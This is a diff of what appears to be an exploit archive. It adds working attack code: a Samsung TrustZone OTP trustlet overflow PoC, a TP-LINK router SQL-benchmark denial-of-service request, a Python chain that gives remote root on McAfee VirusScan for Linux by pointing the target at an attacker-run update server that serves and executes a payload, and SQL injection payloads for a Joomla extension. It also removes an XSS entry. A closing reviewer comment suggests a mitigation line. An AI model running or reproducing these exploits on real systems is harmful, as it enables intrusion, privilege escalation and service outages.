+The tokens themselves are generated in a TrustZone application within the TEE (UID: fffffffff0000000000000000000001e), which can be communicated with using the "OTP" service, published by "otp_server".
+
+Many of the internal commands supported by the trustlet must either unwrap or wrap a token. They do so by calling the functions "otp_unwrap" and "otp_wrap", correspondingly.
+
+Both functions copy the internal token data to a local stack based buffer before attempting to wrap or unwrap it. However, this copy operation is performed using a length field supplied in the user's buffer (the length field's offset changes according to the calling code-path), which is not validated at all.
+
+This means an attacker can supply a length field larger than the stack based buffer, causing the user-controlled token data to overflow the stack buffer. There is no stack cookie mitigation in MobiCore trustlets.
+
+On the device I'm working on (SM-G925V), the "OTP" service can be accessed from any user, including from the SELinux context "untrusted_app". Successfully exploiting this vulnerability should allow a user to elevate privileges to the TrustZone TEE.
+
+I've attached a small PoC which can be used to trigger the overflow. It calls the OTP_GENERATE_OTP command with a large length field which overflows the trustlet's stack. Running it should crash OTP trustlet.
+*/
+
+package com.example.laginimaineb.otp;
+
+import android.os.IBinder;
+import android.os.Parcel;
+import android.os.RemoteException;
+import android.support.v7.app.AppCompatActivity;
+import android.os.Bundle;
+import android.util.Log;
+
+public class OneWhoKNOX extends AppCompatActivity {
+
+ /**
+ * The logtag used.
+ */
+ private static final String LOGTAG = "OTP_TEST";
+
+ /**
+ * The name of the OTP binder service.
+ */
+ private static final String INTERFACE_DESCRIPTOR = "OTP";
+
+ @Override
+ protected void onCreate(Bundle savedInstanceState) {
+ super.onCreate(savedInstanceState);
+ setContentView(R.layout.activity_main);
+
+ try {
+ //Getting the binder
+ Class smClass = Class.forName("android.os.ServiceManager");
+ IBinder binder = (IBinder) smClass.getMethod("getService", String.class).invoke(null, INTERFACE_DESCRIPTOR);
+
+ //Writing a command with a large length field
+ Parcel parcel = Parcel.obtain();
+ Parcel reply = Parcel.obtain();
+ parcel.writeInterfaceToken(INTERFACE_DESCRIPTOR);
+ byte[] command = new byte[0xDA7];
+
+ //Setting the command to OTP_GENERATE_OTP
+ command[0] = 0x02;
+ command[1] = 0x00;
+ command[2] = 0x00;
+ command[3] = 0x00;
+
+ //Setting the length field to something insane
+ command[0x41C] = (byte)0xFF;
+ command[0x41C + 1] = (byte)0xFF;
+ command[0x41C + 2] = (byte)0x00;
+ command[0x41C + 3] = (byte)0x00;
+
+ //Sending the command (should crash the trustlet)
+ parcel.writeByteArray(command);
+ binder.transact(2, parcel, reply, 0);
+ Log.e(LOGTAG, "res=" + reply.readInt());
+ reply.recycle();
+ parcel.recycle();
+
+ } catch (ClassNotFoundException |
+ NoSuchMethodException |
+ IllegalAccessException |
+ InvocationTargetException ex) {
+ Log.e(LOGTAG, "Failed to dynamically load ServiceManager methods", ex);
+ }
+
+ } catch (RemoteException ex) {
+ Log.e(LOGTAG, "Failed to communicate with remote binder", ex);
+ }
+ }
+}
\ No newline at end of file
diff --git a/platforms/hardware/dos/40910.txt b/platforms/hardware/dos/40910.txt
new file mode 100755
index 000000000..70a586414
--- /dev/null
+++ b/platforms/hardware/dos/40910.txt
@@ -0,0 +1,39 @@
+# Exploit Title: TP-LINK TD-W8151N - Denial of Service
+# Date: 2016-12-13
+# Exploit Author: Persian Hack Team
+# Discovered by : Mojtaba MobhaM
+# Home : http://persian-team.ir/
+# Tested on: Windows AND Linux
+# Demo : https://www.youtube.com/watch?v=WrGgHvhiCGg
+
+POC :
+
+flagFresh Parameter Vulnerable
+
+POST /Forms/status_1 HTTP/1.1
+Host: 192.168.1.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: http://192.168.1.1/status.html
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 11
+Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00
+
+flagFresh=0
+
+Request :
+
+POST /Forms/status_1 HTTP/1.1
+Host: 192.168.1.1
+Accept: */*
+Accept-Language: en
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
+Connection: close
+Referer: http://192.168.1.1/status.html
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 51
+Cookie: sessionid=13df8bc9; Language=en; C0=%00; C1=%00
+
+flagFresh=0&1 and benchmark(20000000%2csha1(1))--=1
\ No newline at end of file
diff --git a/platforms/linux/remote/40911.py b/platforms/linux/remote/40911.py
new file mode 100755
index 000000000..82519e741
--- /dev/null
+++ b/platforms/linux/remote/40911.py
@@ -0,0 +1,289 @@ +''' +Source: https://nation.state.actor/mcafee.html + +Vulnerabilities + +CVE-2016-8016: Remote Unauthenticated File Existence Test +CVE-2016-8017: Remote Unauthenticated File Read (with Constraints) +CVE-2016-8018: No Cross-Site Request Forgery Tokens +CVE-2016-8019: Cross Site Scripting +CVE-2016-8020: Authenticated Remote Code Execution & Privilege Escalation +CVE-2016-8021: Web Interface Allows Arbitrary File Write to Known Location +CVE-2016-8022: Remote Use of Authentication Tokens +CVE-2016-8023: Brute Force Authentication Tokens +CVE-2016-8024: HTTP Response Splitting +CVE-2016-8025: Authenticated SQL Injection +When chaned together, these vulnerabilities allow a remote attacker to execute code as root. +''' +#!/bin/python3 +import time +import requests +import os +import sys +import re +import threading +import subprocess +from http.server import BaseHTTPRequestHandler, HTTPServer +from socketserver import ThreadingMixIn + +# Per-target configuration +target_domain="https://10.0.1.130" # https://target_ip +local_ip = '10.0.1.128' # Attacker IP for victim to connect back to +authorized_ip="127.0.0.1" # IP address cookie will be valid for +update_server_port = 8080 # Port update server listens on +delay_seconds = 10 # How long should the server take to serve the update +target_port = 55443 # Port to target + +# Put payload script in payload.sh + +# Initialization +payload_in_place = threading.Event() +requests.packages.urllib3.disable_warnings() +with open("payload.sh", "r") as f: + payload = f.read() + +def pprint(inp, flag=False): + pad = "#" + if flag: + pad = "*" + print("\n" + pad+ " " + inp) + + +def crack_cookie(): + pprint("Cracking Cookie") + + # A page that requires authentication + url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=productUpdate.html" + + # Start at the current time + 100 in case of recent login with clock skew + date_val = int(time.time()+100) + cookie_fmt = 
authorized_ip+"/n/0/%d-checksum// "+authorized_ip + " "*20 + + # Make requests, print after every 600 + while True: + cookie = cookie_fmt % date_val + req_cookie = {"nailsSessionId": cookie} + r = requests.get(url, cookies=req_cookie, verify=False) + r.raise_for_status() + + if "Set-Cookie" in r.headers: + valid_cookie = cookie + timestamp = cookie.split("/")[3].split("-")[0] + break + + elif date_val % 600 == 0: + print("Now trying %s" % time.asctime(time.localtime(date_val))) + + date_val -= 1 + + pprint("Cookie Cracked: " + timestamp, True) + return valid_cookie + + +def update_update_server(auth_cookie): + pprint("Updating update server") + + # Replace McAfeeHttp update server with attacker local_ip:update_server_port + url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&addr=127.0.0.1%3A65443&tplt=" \ + "repository.html&sitelist=add&mon%3A0=db+set+1+_table%3Drepository+status%3D1+siteList%3D%253C%253F" \ + "xml%2520version%253D%25221.0%2522%2520encoding%253D%2522UTF-8%2522%253F%253E%250A%253Cns%253ASiteLists" \ + "%2520xmlns%253Ans%253D%2522naSiteList%2522%2520GlobalVersion%253D%2522PATTeELCQSEhZwxKf4PoXNSY4%2Fg%25" \ + "3D%2522%2520LocalVersion%253D%2522Wed%252C%252030%2520Dec%25202009%252011%253A20%253A59%2520UTC%2522%2" \ + "520Type%253D%2522Client%2522%253E%253CPolicies%2F%253E%253CSiteList%2520Default%253D%25221%2522%2520Na" \ + "me%253D%2522SomeGUID%2522%253E%253CHttpSite%2520Type%253D%2522repository%2522%2520Name%253D%2522McAfee" \ + "Http%2522%2520Order%253D%25221%2522%2520Server%253D%2522"+local_ip+"%253A"+str(update_server_port) \ + + "%2522%2520Enabled%253D%25221%2522%2520Local%253D%25221%2522%253E%253CRelativePath%2F%253E%253CUseAuth%" \ + "253E0%253C%2FUseAuth%253E%253CUserName%253E%253C%2FUserName%253E%253CPassword%2520Encrypted%253D%25220" \ + "%2522%2F%253E%253C%2FHttpSite%253E%253CFTPSite%2520Type%253D%2522fallback%2522%2520Name%253D%2522McAfe" \ + 
"eFtp%2522%2520Order%253D%25222%2522%2520Server%253D%2522ftp.nai.com%253A21%2522%2520Enabled%253D%25221" \ + "%2522%2520Local%253D%25221%2522%253E%253CRelativePath%253ECommonUpdater%253C%2FRelativePath%253E%253CU" \ + "seAuth%253E1%253C%2FUseAuth%253E%253CUserName%253Eanonymous%253C%2FUserName%253E%253CPassword%2520Encr" \ + "ypted%253D%25221%2522%253ECommonUpdater%40McAfeeB2B.com%253C%2FPassword%253E%253C%2FFTPSite%253E%253C%" \ + "2FSiteList%253E%253C%2Fns%253ASiteLists%253E+_cmd%3Dupdate+&mon%3A1=task+setsitelist&mon%3A2=db+select" \ + "+_show%3DsiteList+_show%3Dstatus+_table%3Drepository&info%3A2=multi%2Cshow&reposProperty=repository&re" \ + "posProperty=fallback&useOfProxy=on" + + r = requests.get(url, cookies=auth_cookie, verify=False) + r.raise_for_status() + pprint("Updated update server", True) + +def download_update(req_cookie): + pprint("Requesting target download payload") + + # Send request to make target download payload + url = target_domain + ":" + str(target_port) + "/0409/nails" + + updateName = "update_%d" % int(time.time()) + postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&scheduleOp=add&mon%3A0=db+set+1+_tab" \ + "le%3Dschedule++taskName%3D{0}+taskType%3DUpdate+taskInfo%3DtoUpdate%3Ddat%253Bengine+timetable%3Dtype%" \ + "3Dunscheduled+status%3DIdle++i_recurrenceCounter%3D0+&mon%3A1=task+nstart+{0}&mon%3A2=db+select+_asc%3D" \ + "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+_sh" \ + "ow%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dprogress+" \ + "_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offset%3D0&in" \ + "fo%3A2=multi%2Cshow&mon%3A3=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A3=multi%2Cshow&loc" \ + "%3A4=conf+get+browser.resultsPerPage&info%3A4=multi%2Cshow&mon%3A5=task+updatecrontab&info%3A5=multi%2" \ + 
"Cshow&echo%3A6=1&info%3A6=pageNo&echo%3A7=&info%3A7=selectedTask""").format(updateName) + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) + r.raise_for_status() + + pprint("Payload download requested", 1) + + +def exec_catalogz(req_cookie): + pprint("Making target execute payload") + + #### Get commit_id and ODS_name + url = target_domain + ":" + str(target_port) + "/0409/nails?pg=proxy&tplt=schedOnDemand.html&addr=127.0" \ + ".0.1:65443&mon:0=sconf+ODS+select+section%3Dnailsd.profile.ODS&info:0=multi,show,digest&echo:1=ODS&inf" \ + "o:1=profileName&mon:2=sconf+ODS+select+section%3Dnailsd.profile.ODS_default&info:2=multi,show&echo:3=O" \ + "DS_default&info:3=defaultProfileName&mon:4=sconf+ODS+select+attribute%3Dnailsd.oasEnabled&info:4=multi" \ + ",show&mon:5=extensions&info:5=multi,show&mon:6=db+select+_show=max(i_taskId)+_table=schedule&info:6=mu" \ + "lti,show&mon:7=utco&info:7=single,show,serverUtcOffset&echo:8=generate&info:8=profileNameAction" + + r = requests.get(url, cookies=req_cookie, verify=False) + r.raise_for_status() + + regex = re.search("\|digest=(.+?)\|", r.text) + if not regex: + print("\nERROR: Could not get commit_id when generating evil scan\n") + return False + + commit_id = regex.groups(1)[0] + + # Send request to start evil scan + payload_path = "%2Fopt%2FMcAfee%2Fcma%2Fscratch%2Fupdate%2Fcatalog.z" + binary_path = "%2Fbin%2Fsh" # Use "%2fbin%2Fstatic-sh" for versions 1.x + + url = target_domain + ":" + str(target_port) + "/0409/nails" + + ODS_name = "ODS_1" # This may need to be increased if the name already exists + scan_name = "scan_%s" % str(int(time.time())) + + postdata = ("pg=proxy&addr=127.0.0.1%3A65443&tplt=scheduledTasks.html&mon%3A0=sconf+{1}+begin&info%3A0=" \ + "multi%2Cshow&mon%3A1=sconf+{1}+delete+{0}+section%3Dnailsd.profile.{1}.filter+section%3Dnailsd.prof" \ + 
"ile.{1}.action&mon%3A2=sconf+{1}+set+{0}+nailsd.profile.{1}.allFiles%3Dtrue+nailsd.profile.{1}.child" \ + "InitTmo%3D240+nailsd.profile.{1}.cleanChildren%3D2+nailsd.profile.{1}.cleansPerChild%3D10000+nailsd" \ + ".profile.{1}.datPath%3D%2Fopt%2FNAI%2FLinuxShield%2Fengine%2Fdat+nailsd.profile.{1}.decompArchive%3" \ + "Dtrue+nailsd.profile.{1}.decompExe%3Dtrue+nailsd.profile.{1}.engineLibDir%3D%2Fopt%2FNAI%2FLinuxShi" \ + "eld%2Fengine%2Flib+nailsd.profile.{1}.enginePath%3D{3}+nailsd.profile.{1}.factoryI" \ + "nitTmo%3D240+nailsd.profile.{1}.heuristicAnalysis%3Dtrue+nailsd.profile.{1}.macroAnalysis%3Dtrue+na" \ + "ilsd.profile.{1}.maxQueSize%3D32+nailsd.profile.{1}.mime%3Dtrue+nailsd.profile.{1}.noJokes%3Dfalse+" \ + "nailsd.profile.{1}.program%3Dtrue+nailsd.profile.{1}.quarantineChildren%3D1+nailsd.profile.{1}.quar" \ + "antineDirectory%3D%2Fquarantine+nailsd.profile.{1}.quarantineFromRemoteFS%3Dfalse+nailsd.profile.{1" \ + "}.quarantinesPerChild%3D10000+nailsd.profile.{1}.scanChildren%3D2+nailsd.profile.{1}.scanMaxTmo%3D3" \ + "00+nailsd.profile.{1}.scanNWFiles%3Dfalse+nailsd.profile.{1}.scanOnRead%3Dtrue+nailsd.profile.{1}.s" \ + "canOnWrite%3Dtrue+nailsd.profile.{1}.scannerPath%3D{4}+nailsd.profile.{1}.scansPerChild" \ + "%3D10000+nailsd.profile.{1}.slowScanChildren%3D0+nailsd.profile.{1}.filter.0.type%3Dexclude-path+na" \ + "ilsd.profile.{1}.filter.0.path%3D%2Fproc+nailsd.profile.{1}.filter.0.subdir%3Dtrue+nailsd.profile.{" \ + "1}.filter.1.type%3Dexclude-path+nailsd.profile.{1}.filter.1.path%3D%2Fquarantine+nailsd.profile.{1}" \ + ".filter.1.subdir%3Dtrue+nailsd.profile.{1}.filter.extensions.mode%3Dall+nailsd.profile.{1}.filter.e" \ + "xtensions.type%3Dextension+nailsd.profile.{1}.action.Default.primary%3DClean+nailsd.profile.{1}.act" \ + "ion.Default.secondary%3DQuarantine+nailsd.profile.{1}.action.App.primary%3DClean+nailsd.profile.{1}" \ + ".action.App.secondary%3DQuarantine+nailsd.profile.{1}.action.timeout%3DPass+nailsd.profile.{1}.acti" \ + 
"on.error%3DBlock&mon%3A3=sconf+{1}+commit+{0}&mon%3A4=db+set+{0}+_table%3Dschedule++taskName%3D{2}+" \ + "taskType%3DOn-Demand+taskInfo%3DprofileName%3D{1}%2Cpaths%3Dpath%3A%2Ftmp%3Bexclude%3Atrue+timetabl" \ + "e%3Dtype%3Dunscheduled+progress%3D+status%3DIdle+&mon%3A5=task+nstart+{2}&mon%3A6=db+select+_asc%3D" \ + "taskName+_table%3Dschedule+_show%3Di_taskId+_show%3DtaskName+_show%3DtaskResults+_show%3Dtimetable+" \ + "_show%3DtaskType+_show%3DtaskInfo+_show%3Di_lastRun+_show%3D%24i_lastRun+_show%3Dstatus+_show%3Dpro" \ + "gress+_show%3Di_nextRun+_show%3D%24i_nextRun+_show%3Di_duration+_show%3DtaskInfo++_limit%3D50+_offs" \ + "et%3D0&info%3A6=multi%2Cshow&mon%3A7=db+select+_table%3Dschedule+_show%3Dcount%28*%29&info%3A7=mult" \ + "i%2Cshow&mon%3A8=sconf+ODS+begin&info%3A8=multi%2Cshow%2Cdigest&mon%3A9=task+updatecrontab&info%3A9" \ + "=multi%2Cshow&loc%3A10=conf+get+browser.resultsPerPage&info%3A10=multi%2Cshow&echo%3A11=1&info%3A11" \ + "=pageNo&echo%3A12=&info%3A12=selectedTask").format(commit_id, ODS_name, scan_name,payload_path, binary_path) + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + r = requests.post(url, data=postdata, cookies=req_cookie, verify=False, headers=headers) + r.raise_for_status() + + pprint("Payload executed", 1) + +def start_update_server(): + + class RequestHandler(BaseHTTPRequestHandler): + def do_HEAD(s): + s.send_response(200) + s.send_header("Content-type", "text/html") + s.end_headers() + + def do_GET(s): + if s.path == "/catalog.z": + s.send_response(200) + s.send_header("Content-type", "text/html") + s.end_headers() + s.wfile.write(bytes(payload, "utf-8")) + + pprint("Payload placed", 1) + + payload_in_place.set() + + # Die after sending payload so we send an incomplete response + raise KillServer + + else: # Assume all other requests are for SiteStat - Always increasing version + s.send_response(200) + s.send_header("Content-type", "text/xml") + s.end_headers() + s.wfile.write(bytes(("""""" \ + """""" \ + """ 
""") % int(time.time()), "utf-8")) + + # Throwing KillServer will shutdown the server ungracefully + class KillServer(Exception): + def __str__(self): + return "Kill Server (not an error)" + + # ThreadingMixIn plus support for KillServer exceptions + class AbortableThreadingMixIn(ThreadingMixIn): + def process_request_thread(self, request, client_address): + try: + self.finish_request(request, client_address) + self.shutdown_request(request) + except KillServer: + pprint("Killing update server dirtily") + self.shutdown_request(request) + self.shutdown() # Only if we want to shutdown + except: + self.handle_error(request, client_address) + self.shutdown_request(request) + + + class BackgroundHTTPSrv(AbortableThreadingMixIn, HTTPServer): + pass + + pprint("Launching update server") + + srv = BackgroundHTTPSrv((local_ip, update_server_port), RequestHandler) + threading.Thread(target=srv.serve_forever).start() + + pprint("Update server started", 1) + return srv + + +#################################################################################### +#################################################################################### + +pprint("Attacking %s" % target_domain, 1) + +# Crack the auth cookie +cookie = crack_cookie() +auth_cookie = {"nailsSessionId": cookie} + +# Start our update server locally +srv = start_update_server() + +# Force target to use our update server +update_update_server(auth_cookie) + +# Make target download an update from us +download_update(auth_cookie) + +# Block until the target downloads our payload, +payload_in_place.wait() + +# Shutdown our update server +srv.shutdown() + +# Execute /bin/sh -(?) catalog.z +exec_catalogz(auth_cookie) \ No newline at end of file diff --git a/platforms/php/webapps/33548.txt b/platforms/php/webapps/33548.txt deleted file mode 100755 index c3a948d60..000000000 --- a/platforms/php/webapps/33548.txt +++ /dev/null 
@@ -1,12 +0,0 @@
-source: http://www.securityfocus.com/bid/37855/info
-
-THELIA is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
-
-An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
-
-The issues affect THELIA 1.4.2.1; other versions may also be affected.
-
-
-http://www.example.com/panier.php?action=ajouter&ref=">
-http://www.example.com/produit.php?ref=%22%3E%3Cscript%3Ealert%28/xss/.source%29;%3C/script%3E&id_rubrique=1
-http://www.example.com/rss.php?ref=">&id_rubrique=
\ No newline at end of file
diff --git a/platforms/php/webapps/40912.txt b/platforms/php/webapps/40912.txt
new file mode 100755
index 000000000..5f4c62492
--- /dev/null
+++ b/platforms/php/webapps/40912.txt
@@ -0,0 +1,99 @@
+Title: SQL injection in Joomla extension DT Register
+Credit: Elar Lang / https://security.elarlang.eu
+Vulnerability: SQL injection
+Vulnerable version: before 3.1.12 (Joomla 3.x) / 2.8.18 (Joomla 2.5)
+CVE: pending
+Full Disclosure URL: https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
+Vendor: DTH Development
+Vendor URL: http://www.dthdevelopment.com/
+Product: DT Register "Calendar & Event Registration"
+Product URL: https://extensions.joomla.org/extension/dt-register
+Product URL: http://www.dthdevelopment.com/joomla-components/dt-register-event-registration-for-joomla.html
+
+
+# Background
+
+"DT Register is the Joomla Event Registration component that gives you
+functionality beyond what any other event booking solution can offer"
+(https://extensions.joomla.org/extension/dt-register)
+
+
+# Vulnerability
+
+SQL injection in Joomla extension "DT Register" by DTH Development
+allows remote unauthenticated attacker to execute arbitrary SQL
+commands via the cat parameter.
+
+
+# Preconditions
+
+No pre-conditions for authentication or authorization.
+
+
+# Proof-of-Concept
+
+http://[DOMAIN]/[PATH]/index.php?controller=calendar&format=raw&cat[0]=SQLi&task=events
+
+PoC value (shows out all events / it's possible to see valid eventId values):
+cat[0]=6) OR 1-- -
+
+
+## Using UNION
+
+For reading the data out using UNION it's important to have and to
+know one valid eventId (detected in previous step).
+
+In total there are 112 fields in select query, eventId position is no
+13. For output is best to use position 112.
+
+Step-by-Step - how to read the data out is available in blog:
+https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
+
+
+# Vulnerability Disclosure Timeline
+
+Full communication is available in blog:
+https://security.elarlang.eu/sql-injection-in-joomla-extension-dt-register.html
+
+2016-10-17 | me > DTH | via web form - I would like to report some
+security holes.
What is the correct way for that?
+2016-10-18 | me > DTH | any response?
+2016-10-25 | me > DTH | mail to dthdev@dthdevelopment.com
+2016-10-25 | DTH > me |
+* "you are not in our client list"
+* "Our site (dthdevelopment.com) is protected by an enterprise grade firewall"
+2016-10-25 | me > DTH | I'm whitehat, technical details
+2016-10-25 | DTH > me | description, what kind of serious problems I may face
+2016-10-25 | me > DTH | explanations
+2016-11-02 | me > DTH | hello?
+2016-11-11 | me > DTH, SiteLock | Last call.
+2016-11-11 | SiteLock / DTH / me | some communication
+2016-11-12 | DTH > SiteLock (CC to me) | "It was configured to be open
+in the setup"
+2016-11-15 | DTH | Released DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5)
+2016-12-05 | DTH > me | "Sorry, forgot to respont on this. We closed
+the problem on our demo site".
+2016-12-12 | me | Full Disclosure on security.elarlang.eu
+2016-12-13 | me | Full Disclosure on FullDisclosure mailinglist on seclists.org
+
+
+## asking CVE from DWF (Distributed Weakness Filing Project) /
+http://iwantacve.org
+
+2016-10-20 | me > DWF | CVE request
+2016-10-31 | DWF > me | "CVE - Acceptance of MITRE Terms of Use for
+CVE Assignment"
+2016-10-31 | me > DWF | I accept
+2016-11-19 | me > DWF | Any feedback or decision? (still no response)
+2016-12-11 | me > DWF | Is there any hope to get feedback? (still no response)
+
+As I haven't got any feedback, you can take this post as CVE request.
+
+
+# Fix
+DT Register version 3.1.12 (J3.x) / 2.8.18 (J2.5).
+
+--
+Elar Lang
+Blog @ https://security.elarlang.eu
+Pentester, lecturer @ http://www.clarifiedsecurity.com
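Review bot: The `# Fix` section that closes 40912.txt lists only the fixed releases (3.1.12 / 2.8.18) and gives an operator nothing to check on a site that has not been upgraded yet. The advisory itself says the injection is unauthenticated and is reached through the `cat` array on the `controller=calendar` / `task=events` request, so one added line such as `Until upgraded: review web logs for task=events requests whose cat[] values are not plain integers, and reject such values at the web application firewall.` would make the entry usable for triage. That legitimate `cat` values are integers is inferred from the PoC value `6` and should be confirmed against the extension. The header also still reads `CVE: pending` and should be updated once an identifier is assigned.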